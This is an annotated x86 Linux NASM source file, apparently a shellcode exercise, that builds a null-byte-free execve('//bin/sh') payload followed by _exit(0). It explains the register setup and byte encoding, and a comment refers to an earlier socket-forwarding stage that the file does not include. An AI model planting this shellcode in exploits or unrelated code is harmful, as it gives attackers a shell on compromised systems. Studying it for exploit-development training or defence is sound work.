; Filename: execve-stack.nasm
; Author:   Andrey Arapov
; 2013 March
;
; Linux x86 (32-bit) stage: execve("//bin/sh", ["//bin/sh", NULL], [NULL])
; followed by _exit(0).  The comment below about a forwarded sockfd refers to
; a preceding stage (dup2 onto a client socket) that is NOT part of this file;
; on its own this code simply spawns a shell on the current stdin/stdout/stderr.
;
; Path bytes, little-endian, so they can be pushed as two dwords:
;   Python 2: '//bin/sh'[::-1].encode('hex')   -> '68732f6e69622f2f'
;   Python 3: '//bin/sh'[::-1].encode().hex()  -> '68732f6e69622f2f'
; The leading double slash only pads the path to exactly 8 bytes (two pushes);
; the kernel resolves "//bin/sh" as "/bin/sh".
;
; Register contract for int 0x80:
;   EAX = 11 (__NR_execve)
;   EBX = char *filename          -> "//bin/sh"
;   ECX = char *const argv[]      -> { EBX, NULL }
;   EDX = char *const envp[]      -> { NULL }
; Zero values come from a cleared EDX rather than immediates; together with
; the xor/mov-al pattern this keeps the encoded bytes free of 0x00, which is
; the usual constraint when this is used as shellcode.

global _start

section .text

_start:
    ; --- zero source ---------------------------------------------------
    xor edx, edx            ; EDX = 0; reused for every NUL/NULL below

    ; --- EBX: filename -------------------------------------------------
    push edx                ; '\0' terminator for the path string
    push 0x68732f6e         ; "n/sh"  (bytes 4..7 of "//bin/sh")
    push 0x69622f2f         ; "//bi"  (bytes 0..3) -> string now starts at ESP
    mov ebx, esp            ; EBX -> "//bin/sh"

    ; --- ECX: argv -----------------------------------------------------
    push edx                ; argv[1] = NULL
    push ebx                ; argv[0] = pointer to "//bin/sh"
    mov ecx, esp            ; ECX -> argv

    ; --- EDX: envp -----------------------------------------------------
    push edx                ; envp[0] = NULL (empty environment)
    mov edx, esp            ; EDX -> envp

    ; --- EAX: syscall number, set last so it is not clobbered ---------
    xor eax, eax
    mov al, 0x0b            ; __NR_execve = 11
    int 0x80

    ; --- _exit(0) ------------------------------------------------------
    ; execve only returns on failure (e.g. /bin/sh missing, noexec, seccomp).
    ; NOTE(review): the status is still 0 here, so a failed spawn is not
    ; distinguishable from a clean exit by whoever waits on this process.
    ; /usr/include/asm/unistd_32.h: #define __NR_exit 1
    xor eax, eax
    mov al, 0x01            ; __NR_exit = 1
    xor ebx, ebx            ; status = 0
    int 0x80

;section .data